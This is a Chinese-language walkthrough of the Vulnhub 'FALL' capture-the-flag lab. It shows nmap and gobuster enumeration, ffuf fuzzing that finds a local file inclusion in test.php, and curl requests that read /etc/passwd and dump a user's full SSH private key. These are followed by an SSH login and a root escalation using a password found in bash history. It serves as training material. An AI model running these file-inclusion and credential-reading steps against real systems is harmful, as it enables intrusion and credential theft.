digital world.local:FALL Vulnhub 演练
FALL (digitalworld.local: FALL) 是 Donavan 为 Vulnhub 打造的一款中型机器。这款实验室非常适合经验丰富的 CTF 玩家,他们希望在这类环境中检验自己的技能。那么,让我们开始吧,看看如何将问题分解成易于管理的部分。
1.网络扫描
1.1 首先,netdiscover 无法确定受害 PC 的 IP 地址。当我们启动计算机时,屏幕上会显示其 IP 地址。
Currently scanning: Finished! | Screen View: Unique Hosts 46646 Captured ARP Req/Rep packets, from 5 hosts. Total size: 2798760 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.74.1 00:50:56:c0:00:08 40563 2433780 VMware, Inc. 192.168.74.2 00:50:56:eb:d3:ae 4600 276000 VMware, Inc. 192.168.74.133 00:0c:29:bc:f0:36 908 54480 VMware, Inc. 192.168.74.254 00:50:56:ec:6c:1a 574 34440 VMware, Inc. 0.0.0.0 00:0c:29:bc:f0:36 1 60 VMware, Inc. ┌──(root㉿kali)-[~]
└─# netdiscover -r 192.168.74.0/24
1.2 在我们的场景中,受害者 PC 的 IP 地址是192.168.74.133。为了推进此过程,我们启动了 Nmap。我们运行了一次激进扫描 ( -A ) 来枚举开放端口,并发现了以下端口,如下图所示。
根据nmap扫描的结果,这台机器正在运行各种各样的服务。
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.74.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 11:12 EDT
Nmap scan report for 192.168.74.133
Host is up (0.00038s latency).
Not shown: 979 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
111/tcp closed rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| tls-alpn:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.74.133:9090/
MAC Address: 00:0C:29:BC:F0:36 (VMware)
Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), OpenWrt 21.02 (Linux 5.4) (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.1 - 5.15 (93%), Linux 6.0 (93%), Linux 2.6.39 (93%), OpenWrt 22.03 (Linux 5.10) (93%), Linux 4.19 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h20m00s, deviation: 4h02m31s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-29T15:12:42
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2025-05-29T08:12:42-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.74.133OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.65 seconds┌──(root㉿kali)-[~]
└─#
2.枚举
2.1 首先,我们尝试使用 HTTP。我们来查看 80 端口,看看是否有任何值得注意的发现。我们可以立即在浏览器中验证这一点,因为 Apache 服务器正在监听 80 端口。除了我们发现一个用户名“ qiu ”之外,没有什么特别的发现。
2.2 现在,我们将尝试使用 gobuster,看看能否在这台机器上找到一些可以让我们继续前进的东西。它是一个用于暴力破解网站中的 URI(目录和文件)、DNS 子域(支持通配符)以及目标 Web 服务器上的虚拟主机名的程序。
gobuster dir -u http://192.168.74.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
上述命令将枚举所有具有 .html、.php、.txt 扩展名的文件。
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.74.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.74.133
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 214]
/index.php (Status: 200) [Size: 8385]
/modules (Status: 301) [Size: 238] [--> http://192.168.74.133/modules/]
/uploads (Status: 301) [Size: 238] [--> http://192.168.74.133/uploads/]
/doc (Status: 301) [Size: 234] [--> http://192.168.74.133/doc/]
/admin (Status: 301) [Size: 236] [--> http://192.168.74.133/admin/]
/assets (Status: 301) [Size: 237] [--> http://192.168.74.133/assets/]
/test.php (Status: 200) [Size: 80]
/lib (Status: 301) [Size: 234] [--> http://192.168.74.133/lib/]
/config.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 79]
/error.html (Status: 200) [Size: 80]
/tmp (Status: 301) [Size: 234] [--> http://192.168.74.133/tmp/]
/missing.html (Status: 200) [Size: 168]
/.html (Status: 403) [Size: 214]
/phpinfo.php (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================┌──(root㉿kali)-[~]
└─#
2.3 我们发现了一个值得信赖的目录 (test.php)。我立即打开浏览器查看。如上所述,当我们访问 /test.php 时,会收到一条警报。它声称缺少一个 GET 参数。因此,我们现在只有几种可能性。
3.渗透
3.1 由于我一无所知,所以对 LFI 产生了怀疑。于是我使用 FUZZ 对 /etc/passwd 文件进行模糊测试,以确认 LFI 的存在。借助以下命令,我尝试对缺少的 Get 参数进行模糊测试。
https://github.com/danielmiessler/SecLists/tree/master
┌──(kali㉿kali)-[~]
└─$ unzip SecLists.zip
┌──(root㉿kali)-[~/304]
└─# ffuf -c -w /home/kali/SecLists/Discovery/Web-Content/common.txt -u 'http://192.168.74.133/test.php?FUZZ=/etc/passwd' -fs 80/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev
________________________________________________:: Method : GET:: URL : http://192.168.74.133/test.php?FUZZ=/etc/passwd:: Wordlist : FUZZ: /home/kali/SecLists/Discovery/Web-Content/common.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200-299,301,302,307,401,403,405,500:: Filter : Response size: 80
________________________________________________file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 1ms]
:: Progress: [4746/4746] :: Job [1/1] :: 3636 req/sec :: Duration: [0:00:01] :: Errors: 0 ::┌──(root㉿kali)-[~/304]
└─# 3.2 对于可能缺少术语的“file”参数,我们得到了 200 OK。我们使用 curl 命令调出远程计算机的 /etc/passwd 文件。
┌──(root㉿kali)-[~/304]
└─# curl http://192.168.74.133/test.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false┌──(root㉿kali)-[~/304]
└─#
3.3 我们不难看出,用户名“ qiu ”拥有更高权限的用户账户,并且还拥有bash授权。
现在是时候开始 LFI 漏洞利用了。在探索目录之后,我们利用 LFI,借助 curl 命令枚举了用户qiu的 ssh id_rsa 密钥。
┌──(root㉿kali)-[~/304]
└─# curl http://192.168.74.133/test.php?file=/home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0
FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX
61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien
qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d
Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS
vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO
NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge
d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW
iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka
U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl
KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G
NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs
qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB
8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d
X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk
CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic
ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz
lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ
58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0
acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329
JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+
Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL
RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8
uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC
-----END OPENSSH PRIVATE KEY-----3.4 让我们尝试 SSH 连接,但首先,我们必须将此密钥保存在我们的机器上,并授予必要的权限。那么,让我们开始 SSH 登录……
成功登录SSH后,我们开始提升权限。
┌──(root㉿kali)-[~/304]
└─# nano sshkey304┌──(root㉿kali)-[~/304]
└─# ls
sshkey304┌──(root㉿kali)-[~/304]
└─# chmod 600 sshkey304 ┌──(root㉿kali)-[~/304]
└─# ssh -i sshkey304 qiu@192.168.74.133
The authenticity of host '192.168.74.133 (192.168.74.133)' can't be established.
ED25519 key fingerprint is SHA256:EKK1u2kbhexzA1ZV6xNgdbmDeKiF8lfhmk+8sHl47DY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.133' (ED25519) to the list of known hosts.
Web console: https://FALL:9090/ or https://192.168.74.133:9090/Last login: Sun Sep 5 19:28:51 2021
[qiu@FALL ~]$ ls -al
total 24
drwxr-xr-x. 3 qiu qiu 128 May 21 2021 .
drwxr-xr-x. 3 root root 17 Aug 14 2019 ..
-rw------- 1 qiu qiu 292 Sep 5 2021 .bash_history
-rw-r--r--. 1 qiu qiu 18 Mar 15 2018 .bash_logout
-rw-r--r--. 1 qiu qiu 193 Mar 15 2018 .bash_profile
-rw-r--r--. 1 qiu qiu 231 Mar 15 2018 .bashrc
-rw-r--r-- 1 qiu qiu 27 May 21 2021 local.txt
-rw-rw-r-- 1 qiu qiu 38 May 21 2021 reminder
drwxr-xr-x 2 qiu qiu 61 May 21 2021 .ssh3.5 权限提升
我们现在要做的就是检查 bash 历史记录并找到一些有价值的信息。
我们获得了用户“ qiu ”和密码“ remarkablyawesome ”,并运行了sudo命令来检查该用户的权限。
sudo -l
用户“qiu”已被授予成为root用户所需的所有权限。我们只需切换用户帐户并提交上面列出的密码即可。
万岁!现在我们有了根目录,我们必须导航到根目录才能获取根标志。
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
ifconfig
ping www.google.com
ps -aux
ps -ef | grep apache
env
env > env.txt
rm env.txt
lsof -i tcp:445
lsof -i tcp:80
ps -ef
lsof -p 1930
lsof -p 2160
rm .bash_history
exit
ls -al
cat .bash_history
exit
[qiu@FALL ~]$
[qiu@FALL ~]$ sudo -l
[sudo] password for qiu:
Matching Defaults entries for qiu on FALL:!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENTLC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser qiu may run the following commands on FALL:(ALL) ALL
[qiu@FALL ~]$ sudo su
[root@FALL qiu]# cd /root
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
[root@FALL ~]#
这就是我们深入机器核心的方法。这是一次非常棒的练习,而且大家一起加油也很有趣。为了理解各种场景,有必要尝试一下。
